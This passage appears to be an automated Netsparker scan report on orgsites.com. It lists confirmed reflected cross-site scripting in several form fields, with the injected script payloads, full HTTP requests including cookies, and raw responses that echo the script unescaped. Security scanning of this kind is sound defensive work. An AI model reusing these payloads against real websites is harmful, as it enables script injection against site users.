</select><br /><font size="1">&nbsp;&nbsp;State<br />&nbsp;&nbsp;<select name="gstate"><OPTION value=ALL>ALL<OPTION VALUE="ALL">ALL<OPTION VALUE=*>Choose<OPTION VALUE=AL>Alabama<OPTION VALUE=AK>Alaska<OPTION VALUE=AZ>Arizona<OPTION VALUE=AR>Arkansas<OPTION VALUE=CA>California<OPTION VALUE=CO>Colorado<OPTION VALUE=CT>Connecticut<OPTION VALUE=DE>Delaware<OPTION VALUE=DC>D.C.<OPTION VALUE=FL>Florida<OPTION VALUE=GA>Georgia<OPTION VALUE=HI>Hawaii<OPTION VALUE=ID>Idaho<OPTION VALUE=IL>Illinois<OPTION VALUE=IN>Indiana<OPTION VALUE=IA>Iowa<OPTION VALUE=KS>Kansas<OPTION VALUE=KY>Kentucky<OPTION VALUE=LA>Louisiana<OPTION VALUE=ME>Maine<OPTION VALUE=MD>Maryland<OPTION VALUE=MA>Massachusetts<OPTION VALUE=MI>Michigan<OPTION VALUE=MN>Minnesota<OPTION VALUE=MS>Mississippi<OPTION VALUE=MO>Missouri<OPTION VALUE=MT>Montana<OPTION VALUE=NE>Nebraska<OPTION VALUE=NV>Nevada<OPTION VALUE=NH>New Hampshire<OPTION VALUE=NJ>New Jersey<OPTION VALUE=NM>New Mexico<OPTION VALUE=NY>New York<OPTION VALUE=NC>North Carolina<OPTION VALUE=ND>North Dakota<OPTION VALUE=OH>Ohio<OPTION VALUE=OK>Oklahoma<OPTION VALUE=OR>Oregon<OPTION VALUE=PA>Pennsylvania<OPTION VALUE=RI>Rhode Island<OPTION VALUE=SC>South Carolina<OPTION VALUE=SD>South Dakota<OPTION VALUE=TN>Tennessee<OPTION VALUE=TX>Texas<OPTION VALUE=UT>Utah<OPTION VALUE=VT>Vermont<OPTION VALUE=VA>Virginia<OPTION VALUE=WA>Washington<OPTION VALUE=DC>Washington D.C.<OPTION VALUE=WV>West Virginia<OPTION VALUE=WI>Wisconsin<OPTION VALUE=WY>Wyoming</select><br />&nbsp;&nbsp;City:<br /></font>&nbsp;&nbsp;<input type="text" size="15" name="gcity" value="\'\"--></style></script><script>netsparker(0x0025A3)</script>"><p />&nbsp;&nbsp;<input type="radio" name="sts" CHECKED value="Y">Sites <input type="radio" name="sts" value="E">Events &nbsp;&nbsp;<input type="submit" name="FullSearch" value="GO"></td></tr></table></td></tr><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/bottom.gif width="174" height="11" border="0" alt="bottom.gif"></td></tr></table></form><p /><!--=============== SITES PANEL ===============--><table width="174" cellspacing="0" cellpadding="0" border="0"><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/new.gif width="174" height="28" border="0" alt="New OrgSites"></td></tr><tr bgcolor="#ffffcc"><td width="2" align="left" valign="top" bgcolor="#989868"><img src=images/s.gif width="2" height="10" border="0"></td><td><table width="171" cellspacing="0" cellpadding="5" border="0"><tr><td valign="top" bgcolor="#cccc99"><font face="verdana,arial,helvetica" size="-2"><!--FeaturedSites.html Start--><table border="0" width="100%" cellpadding="2" cellspacing="0"><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633"><a href="md/church-crafts-and-activities" target="_blank">Church Crafts & Activities</a></font><br clear="all" /><font face="verdana,arial,helvetica" size="-2" color="#666633">Religion<br />, </td></tr><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633"><a href="ca/caf-socal" target="_blank">CAF - SouthernCalifornia Wing&#039;sWWII Aviation Museum</a></font><br clear="all" /><font face="verdana,arial,helvetica" size="-2" color="#666633">Unique<br />Camarillo, CA</td></tr><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633">..
- /index.html

/index.html CONFIRMED

http://www.orgsites.com/index.html

Parameters

Parameter Type Value
neighborhood POST ALL
sts POST E
SRCname POST '"--></style></script><script>alert(0x002620)</script>
zzzip POST search

Request

POST /index.html HTTP/1.1
Referer: http://www.orgsites.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 129
Accept-Encoding: gzip, deflate

neighborhood=ALL&sts=E&SRCname='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002620)%3c%2fscript%3e&zzzip=search

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:37:00 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Set-Cookie: idVistor[3]=700911489; expires=Tue, 03-May-11 17:37:12 GMT; path=/; domain=.orgsites.com
Transfer-Encoding: chunked
Content-Type: text/html


<!--added html xmlns below on 12-03-10--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" /><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" /><head><meta name="description" content="FREE websites and registry for organizations groups clubs teams, we help you create a free website which lists your events on Global Neighborhood Orgsites Registry Directory of Organizations with internal search engine"><meta name="keywords" content="Free websites,Registry Directory of Organizations,teams, members,organization management,clubs,groups,associations, search engine,events,global neighborhood,orgsites.com"><title>Free websites and registry directory for organizations or groups plus internal search engine for Global Neighborhood Orgsites free websites</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-type" content="text/html; charset=iso-8859-1" /><meta http-equiv="pragma" content="no-cache" /><meta name="robots" content="Index,Follow" /><style type="text/css"><!--a:link {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:active {color :#660000; font-family:arial,helvetica; text-decoration:underline;}a:visited {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:hover {color :Chocolate; font-family:arial,helvetica; text-decoration:underline;}--></style><script type="text/javascript" language="javascript">// <![CDATA[function OpenWindowE(url, name){ popupWin = window.open(url, name, 'noscroll,width=300,height=350,left=50,top=50')}//01-30-11: change window parms to make it largerfunction OpenWindowJ(url, name){//01-30-11 popupWin = window.open(url, name, 'scrollbars,width=490,height=480,left=10,top=0') popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}function OpenWindowM(url, name){ popupWin = window.open(url, name, 'noscroll,status,width=380,height=245,left=50,top=50')}function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// ]]> </script></head><body bgcolor="#ffffcc" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#003333" link="#800000" vlink="#800000" alink="#660000"><a name="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td width="176" align="left" valign="top" rowspan="2" bgcolor="#FFFFFF"><map name="OrgSite"><area shape="RECT" coords="15,13,175,59" href="index.html"></map><img src=images/logo2.gif width="176" height="182" border="0" usemap="#OrgSite" alt="OrgSites"><img src=images/join2.gif width="176" height="20" alt="Join Now!" border="0" align="top"><table width="176" cellpadding="4" cellspacing="0" border="0"><tr valign="top"><td width="4" valign="top"><img src=images/s.gif width="4" height="1" border="0" alt="s.gif"></td><td valign="top"><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#d27a2b"><!--_leftT.html Start-->
<a href=javascript:OpenWindowJ('002_Website.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">
<b><font size="1"> WEBSITE</a>:</b> <br />(Create your site)
<br />
<a href=javascript:OpenWindowJ('002_NewsBar.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif"> NEWSBAR</a>: <br />(Create your newsbar)
<br />
<a href=javascript:OpenWindowJ('002_Directory.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">�DIRECTORY ENTRY</a>: <br/>(Don't need a website but want to be in the OrgSites Directory)
<br clear="all" />
<img src=../images/s.gif width="120" height="2" border="0" alt="s.gif">
Click on your choice.<br clear="all" />
You'll be on-line in minutes. Questions?<br />Read our <a href=http://www.orgsites.com/index.html?page=5>FAQs</a>.
</font>
<!--_leftT.html End--></td><td>&nbsp;&nbsp;</td></tr></table><br /><form action="index.html" method="POST"><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td>&nbsp;</td><td width="0" valign="top"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633"><b>Search<br>Neighborhood</b><br /></font></td></tr><tr valign="top"><td width="17"><img src=images/s.gif width="17" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Want to know what's<br />going on in a neighborhood?<br />Enter the zipcode<br>and &quot;Go&quot; find out.<br clear="all" /><img src=images/s.gif width="100" height="5"><br clear="all" />Category:<br /><select name="neighborhood"><option value="ALL">ALL
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><input type="radio" name="sts" CHECKED value="E">Events <input type="radio" name="sts" value="Y">Sites<br />Zip code:<br /><input type="text" name="SRCname" value="\'\"--></style></script><script>netsparker(0x002620)</script>" size="9"><input type="submit" name="ZipSearch" value="Go!"></td></tr></table><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#006666"><input type="hidden" name="zzzip" value="search"></form><p /></td><td>&nbsp;&nbsp;&nbsp;</td></tr><!--_leftB.php3 Start-->
<!-- Talk to us section -->
<tr>
<td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td>
<td valign="top">
<font size="2" face="verdana,arial,helvetica" color="#666633">
<a href=javascript:OpenWindowE('_TOOL_eformH.php3?mailus=Mail','')>
<b>Talk to Us...</b></a><br /></font>
<font size="1" face="verdana,arial,helvetica" color="#666633">
Send us your questions or comments about your OrgSite. We really value your input, as it helps us prioritize our improvements.<p />
</td>
<td>����</td>
</tr>
<!--_leftB.php3 End--></table><!-- =============== end nested left nav table =============== --></td><!-- =============== DATE second column =============== --><td colspan="2" align="right" valign="top" bgcolor="#ffffcc"><img src=images/s.gif width="16" height="2" border="0" alt="s.gif"><br clear="all" /><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Monday May 02, 2011&nbsp;&nbsp;&nbsp;</font></td></tr><!-- =============== start second row =============== --><tr><td align="left" valign="top" bgcolor="#ffffcc"><table width="100%" cellspacing="0" cellpadding="13" border="0"><tr><td align="left" valign="top" bgcolor="#ffffcc"><!-- =============== start includes =============== --><table cellspacing="0" cellpadding="0" width="100%" border="0"><tr bgcolor="#cccc99"><td align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc">&nbsp; <b>All Events This Week:</b></font>&nbsp;<font face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc" size="2">Within Zip Area \'\"--></style></script><script>netsparker(0x002620)</script></td> <td align="right" valign="top"><img src=images/rcorner.gif width="11" height="11" border="0" alt="rcorner.gif"></td></tr><tr bgcolor="#989868"><td colspan="2" valign="top"><img src=images/s.gif width="360" height="2"></td></tr></table><p /><!-- =============== end include section =============== --></td></tr></table></td><!-- =============== end nested text table =============== --><!--RightPanel.incl Start--><td width="190" align="left" valign="top" bgcolor="#ffffcc"><!--=============== KEYWORD SEARCH PANEL ===============--><form action="index.html" method="post"><img src=images/s.gif width="174" height="16"><table width="174" cellspacing="0" cellpadding="0" border="0"><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/keyword.gif width="174" height="28" border="0" alt="Keyword Search"></td></tr><tr bgcolor="#ffffcc"><td width="2" align="left" valign="top" bgcolor="#989868"><img src=images/s.gif width="2" height="10" border="0"></td><td><table width="171" cellspacing="0" cellpadding="5" border="0"><tr><td valign="bottom" bgcolor="#cccc99"><font face="verdana,arial,helvetica" size="-2" color="#666633">&nbsp;&nbsp;Keyword:<br />&nbsp;&nbsp;<input type="text" name="keyw" size="15" value=""><br />&nbsp;&nbsp;Category:<br />&nbsp;&nbsp;<select name="neighborhood"><OPTION value=ALL>ALL<OPTION VALUE="ALL">ALL
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><font size="1">&nbsp;&nbsp;State<br />&nbsp;&nbsp;<select name="gstate"><OPTION VALUE="ALL">ALL<OPTION VALUE=*>Choose<OPTION VALUE=AL>Alabama<OPTION VALUE=AK>Alaska<OPTION VALUE=AZ>Arizona<OPTION VALUE=AR>Arkansas<OPTION VALUE=CA>California<OPTION VALUE=CO>Colorado<OPTION VALUE=CT>Connecticut<OPTION VALUE=DE>Delaware<OPTION VALUE=DC>D.C.<OPTION VALUE=FL>Florida<OPTION VALUE=GA>Georgia<OPTION VALUE=HI>Hawaii<OPTION VALUE=ID>Idaho<OPTION VALUE=IL>Illinois<OPTION VALUE=IN>Indiana<OPTION VALUE=IA>Iowa<OPTION VALUE=KS>Kansas<OPTION VALUE=KY>Kentucky<OPTION VALUE=LA>Louisiana<OPTION VALUE=ME>Maine<OPTION VALUE=MD>Maryland<OPTION VALUE=MA>Massachusetts<OPTION VALUE=MI>Michigan<OPTION VALUE=MN>Minnesota<OPTION VALUE=MS>Mississippi<OPTION VALUE=MO>Missouri<OPTION VALUE=MT>Montana<OPTION VALUE=NE>Nebraska<OPTION VALUE=NV>Nevada<OPTION VALUE=NH>New Hampshire<OPTION VALUE=NJ>New Jersey<OPTION VALUE=NM>New Mexico<OPTION VALUE=NY>New York<OPTION VALUE=NC>North Carolina<OPTION VALUE=ND>North Dakota<OPTION VALUE=OH>Ohio<OPTION VALUE=OK>Oklahoma<OPTION VALUE=OR>Oregon<OPTION VALUE=PA>Pennsylvania<OPTION VALUE=RI>Rhode Island<OPTION VALUE=SC>South Carolina<OPTION VALUE=SD>South Dakota<OPTION VALUE=TN>Tennessee<OPTION VALUE=TX>Texas<OPTION VALUE=UT>Utah<OPTION VALUE=VT>Vermont<OPTION VALUE=VA>Virginia<OPTION VALUE=WA>Washington<OPTION VALUE=DC>Washington D.C.<OPTION VALUE=WV>West Virginia<OPTION VALUE=WI>Wisconsin<OPTION VALUE=WY>Wyoming</select><br />&nbsp;&nbsp;City:<br /></font>&nbsp;&nbsp;<input type="text" size="15" name="gcity" value=""><p />&nbsp;&nbsp;<input type="radio" name="sts" CHECKED value="Y">Sites <input type="radio" name="sts" value="E">Events &nbsp;&nbsp;<input type="submit" name="FullSearch" value="GO"></td></tr></table></td></tr><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/bottom.gif width="174" height="11" border="0" alt="bottom.gif"></td></tr></table></form><p /><!--=============== SITES PANEL ===============--><table width="174" cellspacing="0" cellpadding="0" border="0"><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/new.gif width="174" height="28" border="0" alt="New OrgSites"></td></tr><tr bgcolor="#ffffcc"><td width="2" align="left" valign="top" bgcolor="#989868"><img src=images/s.gif width="2" height="10" border="0"></td><td><table width="171" cellspacing="0" cellpadding="5" border="0"><tr><td valign="top" bgcolor="#cccc99"><font face="verdana,arial,helvetica" size="-2"><!--FeaturedSites.html Start--><table border="0" width="100%" cellpadding="2" cellspacing="0"><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633"><a href="md/church-crafts-and-activities" target="_blank">Church Crafts & Activities</a></font><br clear="all" /><font face="verdana,arial,helvetica" size="-2" color="#666633">Religion<br />, </td></tr><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633"><a href="ca/caf-socal" target="_blank">CAF - SouthernCalifornia Wing&#039;sWWII Aviation Museum</a></font><br clear="all" /><font face="verdana,arial,helvetica" size="-2" color="#666633">Unique<br />Camarillo, CA</td></tr><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633"><a href="pa/g..
- /_TOOL_eformH.php3

/_TOOL_eformH.php3 CONFIRMED

http://www.orgsites.com/_TOOL_eformH.php3

Parameters

Parameter Type Value
cbody POST 3
email POST netsparker@example.com
fname POST '"--></style></script><script>alert(0x002959)</script>
Zmail POST SEND IT

Request

POST /_TOOL_eformH.php3 HTTP/1.1
Referer: http://www.orgsites.com/_TOOL_eformH.php3?mailus=Mail
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 144
Accept-Encoding: gzip, deflate

cbody=3&email=netsparker%40example.com&fname='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002959)%3c%2fscript%3e&Zmail=SEND+IT

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:51:36 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\" /><html xmlns=\"http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" /><head><title>Talk to us at OrgSites</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-type" content="text/html; charset=iso-8859-1" /><meta http-equiv="pragma" content="no-cache" /><meta name="robots" content="Index,Follow" /></head><body bgcolor="#ffffcc"><div align="center"><font face="Verdana, Arial, Helvetica, sans-serif"><font color="#FF0000"><b>Thank you \'\"--></style></script><script>netsparker(0x002959)</script> ! ...We will reply as soon as we can.</b></font></div><p />Click <a href="javascript:close()">HERE</a> to return<p /><font size="2">
- /002_Directory.php3

/002_Directory.php3 CONFIRMED

http://www.orgsites.com/002_Directory.php3

Parameters

Parameter Type Value
firstN POST '"--></style></script><script>alert(0x00298D)</script>
lastN POST 3
email POST netsparker@example.com
user POST 3
passwrd1 POST 3
passwrd2 POST 3
MAINurl POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
body POST 3
keyw POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y
DirFLAG POST Y

Request

POST /002_Directory.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Directory.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 302
Accept-Encoding: gzip, deflate

firstN='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00298D)%3c%2fscript%3e&lastN=3&email=netsparker%40example.com&user=3&passwrd1=3&passwrd2=3&MAINurl=3&title=3&street=3&city=3&state=3&zip=3&phone=3&body=3&keyw=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y&DirFLAG=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 17:53:18 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<html><head><SCRIPT LANGUAGE=JavaScript><!-- Beginvar submitcount=0;function checkFields() { if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}// End --></script><script language=javascript><!--function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// --></script><title>OrgSites Directory Listing Signup</title></head><body bgcolor=cccc99 text=666633 link=537492 vlink=000000><form action="002_Directory.php3" method="post" onSubmit="return checkFields()"><center><table width=450 cellpadding=5 cellspacing=0 border=1><tr bgcolor=ffffcc><td><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Get your FREE OrgSites Directory Listing!</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><TR><td align=left valign=top colspan=2 width=100%><FONT COLOR=black FACE="arial,helvetica" size=2></td></tr><tr><td align=left valign=top width=50%><P><font FACE="arial,helvetica" color=#002F1C size=2><table width=60% cellpadding=3 cellspacing=0 border=0><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2><font color=red size=1>First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr><p><font color=black><font size=1><i>ALL FIELDS ARE REQUIRED.<br>Accurate email address is VERY important.</i></font><P></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2><img src=images/s.gif height=1 width=200><br clear=all>First Name</td><td align=left valign=top><input type="text" name="firstN" size=15 value=\'\"--></style></script><script>netsparker(0x00298D)</script>></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Last Name</td><td align=left valign=top><input type="text" name="lastN" size=15 value=3></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Email Address</td><td align=left valign=top><input type="text" name="email" size=25 value=netsparker@example.com></td></tr><tr><td align=right valign=top><font FACE="arial,helvetica" color=#002F1C size=2>Choose your USER ID name</td><td align=left valign=top><input type="text" name="user" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Please choose a password</td><td align=left valign=middle><input type="password" name="passwrd1" size=15 value=3></td></tr><tr><td align=right valign=middle><font FACE="arial,helvetica" color=#002F1C size=2>Type password again to verify</td><td align=left valign=middle><input type="password" name="passwrd2" size=15 value=3></td></tr></table></td></tr><tr><td valign=top width=50%><font face="arial,helvetica" color=black size=2><table cellpadding=5 cellspacing=0 border=0><tr><td colspan=2 align=left valign=bottom><font FACE="arial,helvetica" color=#002F1C size=2><HR><font color=blue><I><b>Enter the full URL (web site address) for the site<br>you want to list inOrgSites' Directory.</b></font></i><p><font color=blue><i>Website address of site you want<br>to list in OrgSites' Directory</i> <font size=1>(full URL <font color=red>including &quot;http://&quot;</font>)</font></font> <br><input type=text name=MAINurl size=40 value=3><HR><p><P>Name or title of your organization<br><font size=1>(This name or title will appear in the OrgSites' Directory, but you can change it later.)</font><br><input type="text" name="title" size=40 value="3"><BR>Organization's street address<br><input type="text" name="street" size=40 value="3"></td></tr><tr><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>city<br><input type="text" name="city" size=15 value=3><br>state<br><SELECT NAME="state"><option value=3>3<OPTION VALUE="AL">Alabama<OPTION VALUE="AK">Alaska<OPTION VALUE="AZ">Arizona<OPTION VALUE="AR">Arkansas<OPTION VALUE="CA">California<OPTION VALUE="CO">Colorado<OPTION VALUE="CT">Connecticut<OPTION VALUE="DE">Delaware<OPTION VALUE="DC">D.C.<OPTION VALUE="FL">Florida<OPTION VALUE="GA">Georgia<OPTION VALUE="HI">Hawaii<OPTION VALUE="ID">Idaho<OPTION VALUE="IL">Illinois<OPTION VALUE="IN">Indiana<OPTION VALUE="IA">Iowa<OPTION VALUE="KS">Kansas<OPTION VALUE="KY">Kentucky<OPTION VALUE="LA">Louisiana<OPTION VALUE="ME">Maine<OPTION VALUE="MD">Maryland<OPTION VALUE="MA">Massachusetts<OPTION VALUE="MI">Michigan<OPTION VALUE="MN">Minnesota<OPTION VALUE="MS">Mississippi<OPTION VALUE="MO">Missouri<OPTION VALUE="MT">Montana<OPTION VALUE="NE">Nebraska<OPTION VALUE="NV">Nevada<OPTION VALUE="NH">New Hampshire<OPTION VALUE="NJ">New Jersey<OPTION VALUE="NM">New Mexico<OPTION VALUE="NY">New York<OPTION VALUE="NC">North Carolina<OPTION VALUE="ND">North Dakota<OPTION VALUE="OH">Ohio<OPTION VALUE="OK">Oklahoma<OPTION VALUE="OR">Oregon<OPTION VALUE="PA">Pennsylvania<OPTION VALUE="RI">Rhode Island<OPTION VALUE="SC">South Carolina<OPTION VALUE="SD">South Dakota<OPTION VALUE="TN">Tennessee<OPTION VALUE="TX">Texas<OPTION VALUE="UT">Utah<OPTION VALUE="VT">Vermont<OPTION VALUE="VA">Virginia<OPTION VALUE="WA">Washington<OPTION VALUE="DC">Washington D.C.<OPTION VALUE="WV">West Virginia<OPTION VALUE="WI">Wisconsin<OPTION VALUE="WY">Wyoming</SELECT><BR>Postal Code (ZIP)<br><input type="text" name="zip" size=15 value=3><br></td><td align=left valign=top><font FACE="arial,helvetica" color=#002F1C size=2>phone# (555-555-5555)<br><input type="text" name="phone" size=15 value="3"><br></td></tr><tr><td colspan=2 align=left valign=top><font FACE="arial,helvetica" color=002F1C size=2><HR></td></tr><tr bgcolor=ffffcc><td colspan=2 align=left valign=top><FONT FACE="Verdana, Arial, Helvetica" size=2><table width=100%><tr><td align=left valign=bottom><font FACE="Verdana, Arial, Helvetica" size=4><b>Describe your organization and<br>choose your Directory Listing address</b></font></td></tr><tr><td width=100% align=center valign=top bgcolor=666633><img src=images/s.gif height=3 width=3><br></td></tr></table><table width=100% cellspacing=0 cellpadding=6 border=0 BGCOLOR=ffffcc><tr><td width=50%><p><font FACE="arial,helvetica" color=002F1C size=2><p>Short description of your organization<br><font size=1>(This description will appear in OrgSites' Directory)</font><br><textarea name=body cols=40 rows=5 wrap=virtual>3</textarea><p>Unique key words / phrases separated by commas:<br><font size=1>(Approx 10 words used for OrgSites' Directory Searches)</font><br><textarea name=keyw cols=40 rows=2 wrap=virtual>3</textarea><p>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align=center><p><select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><P>PICK YOUR INTERNET ADDRESS (Suffix):<P>When you enter your site into OrgSites' Directory, you will receive a NewsBar 